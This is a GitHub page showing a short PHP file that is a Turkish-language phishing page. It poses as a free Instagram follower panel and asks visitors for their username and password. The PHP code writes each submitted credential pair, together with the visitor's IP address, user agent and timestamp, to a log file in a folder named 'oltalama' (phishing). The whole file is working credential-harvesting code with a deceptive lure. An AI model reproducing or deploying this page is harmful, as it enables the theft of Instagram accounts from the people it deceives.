-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathindex.php
36 lines (30 loc) · 1.3 KB
/
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Takipçi Paneli</title>
</head>
<body bgcolor="#808080">
<form method="get">
<font color="#bf00ff">Kullanıcı Adı:</font> <input type="text" name="kullanici_adi" title="Kullanıcı ad giriniz" required=""> <br>
<font color="#bf00ff">Şifre:</font> <input type="password" name="kullanici_sifre" title="Şifre giriniz" required=""> <br>
<button value="input">Takipçi At</button><br>
<br>
<font color="red">Bilgilerinizi girdikten sonra instagram hesabınızı inceleyecek ve size 30-45 aralığında
takipçi gidecektir. Her gün 1 hakkınız vardır. 30 dakika içinde takipçi gelmezse bilgiler uyuşmuyor demektir. Bilgilerinizi doğru giripte takipçi gelmemiş ise
sitemize tekrar giriş yapınız.</font>
</form>
<?php
date_default_timezone_set('Europe/Istanbul');
$ac = fopen("oltalama/kayitlar.txt","a");
$tarih = date('d-m-Y H:i:s',time());
$usr = $_SERVER['HTTP_USER_AGENT'];
$bosluk = "\n";
$bossluk = "\n";
$ip_adres = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['REMOTE_ADDR'];
$al = " KULLANICI ADI > ".$_GET['kullanici_adi']." SİFRE > ".$_GET['kullanici_sifre']." Ip adresi: ".$ip_adres." USER AGENT > ".$usr." İslem Tarihi > ".$tarih.$bosluk.$bossluk;
$yaz = fwrite($ac,$al);
fclose($ac);
?>
</body>
</html>